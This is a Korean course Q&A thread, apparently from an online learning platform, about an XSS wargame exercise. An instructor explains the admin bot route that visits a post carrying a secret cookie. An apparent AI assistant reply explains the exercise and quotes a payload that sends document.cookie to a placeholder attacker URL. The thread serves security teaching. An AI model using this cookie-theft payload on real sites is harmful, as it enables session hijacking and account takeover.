XSS 1번 문제

작성한 질문수 1

0

코드를 보면 Admin Bot이 특정 게시물을 방문하도록 설계되어 있기 때문입니다.

핵심은 /admin/<post_id> 입니다.

@app.route("/admin/<int:post_id>", methods=["GET", "POST"])
def admin(post_id):
    target_url = localhost + f"/post/{post_id}"

    cookie = {"name": "cookie", "value": SECRET_KEY}
    success = read_url(target_url, cookie)

여기서 Bot은:

1. cookie=SECRET_KEY 를 가진 상태로
   

2. /post/<post_id> 페이지를 방문하게 됩니다!

/?memo= 는 단순히 파라미터로 나누기 위한 값 입니다! 임의로 다른 값으로 설정해도 됩니다 :)

0

안녕하세요, 인프런 AI 인턴입니다. 김재경님.

XSS 1번 문제에서 ‘Activate admin bot’ 버튼을 사용하는 이유는, XSS 공격이 실제 서버나 클라이언트 환경에서 어떻게 작용하는지를 이해하기 위함입니다. 이 과정에서, 어드민 봇은 해당 게시물을 실행하여 실제 XSS 공격이 이뤄졌을 때의 상황을 시뮬레이션하게 됩니다. 이는 XSS의 본질적인 목표인 세션 탈취나 비인가 접근을 얼마나 효과적으로 수행할 수 있는지를 검증할 수 있는 좋은 방법 중 하나입니다.

또한, <script> 태그 내의 공격 파라미터에 대해 설명드리겠습니다. location.href = "공격자의 URL/?memo=" + document.cookie;에서 / 뒤의 ?memo=는 쿼리 파라미터 포맷을 사용하여 쿠키 데이터를 공격자가 지정한 URL로 전송하려는 의도를 나타냅니다. 이는 서버가 추가적인 정보를 가져가는 방식으로 자주 사용되며, 쿼리 파라미터를 통해 다수의 정보를 서버 측으로 전달할 수 있습니다.

문제와 관련된 추가적인 정보나 유사한 사례를 참고하시려면 아래의 유사한 질문 링크를 확인하실 수 있습니다:
- XSS 문제 해결 팁과 사례 분석

저는 질문자님의 이해를 돕고자 지식공유자님의 기존 답변을 참고하여 유사한 답변 링크를 추천해드리고 있습니다.
현재 베타 기능으로 답변이 만족스럽지 않을 수 있는 점 양해 부탁드립니다. 🙏
추가적으로 궁금한 점이 있으시면, 이어서 질문해 주세요. 곧 지식공유자께서 답변해 주실 것입니다.